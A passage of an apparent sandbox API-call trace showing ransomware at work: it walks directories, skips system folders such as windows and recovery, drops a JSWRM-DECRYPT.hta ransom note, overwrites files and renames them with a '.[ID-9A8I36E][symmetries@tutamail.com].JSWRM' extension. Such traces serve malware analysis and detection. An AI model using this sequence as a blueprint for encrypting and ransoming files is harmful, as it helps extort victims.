24 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0058.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0058.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0058.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.837] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0058.838] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.838] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0058.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0058.839] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.839] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.839] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1032", cAlternateFileName="")) returned 1 [0058.839] lstrcmpiW (lpString1="1032", lpString2=".") returned 1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="..") returned 1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="...") returned 1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="windows") returned -1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="recovery") returned -1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="perflogs") returned -1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="documents and settings") returned -1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="$RECYCLE.BIN") returned 1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="system volume information") returned -1 [0058.840] lstrcmpiW (lpString1="1032", lpString2="msocache") returned -1 [0058.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226130 [0058.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.840] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1032\\jswrm-decrypt.hta")) returned 0xffffffff [0058.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226130 | out: hHeap=0x1e0000) returned 1 [0058.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0058.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.842] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1032\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.844] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.844] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.845] CloseHandle (hObject=0x450) returned 1 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0058.846] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1032\\jswrm-decrypt.hta")) returned 0x20 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0058.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.846] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19bc8557, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232000 [0058.846] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.846] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19bc8557, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.846] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.846] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.846] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.846] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.846] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.846] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.846] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.846] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.847] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.847] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.847] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.847] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.847] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0058.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0058.847] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.848] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=8876) returned 1 [0058.848] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22a0) returned 0x23dc88 [0058.848] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x22a0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x22a0, lpOverlapped=0x0) returned 1 [0058.850] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.850] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x22a0, lpOverlapped=0x0) returned 1 [0058.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.850] CloseHandle (hObject=0x3d4) returned 1 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0058.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.851] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0058.852] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19bc8557, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19bc8557, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19bc8557, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.853] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, 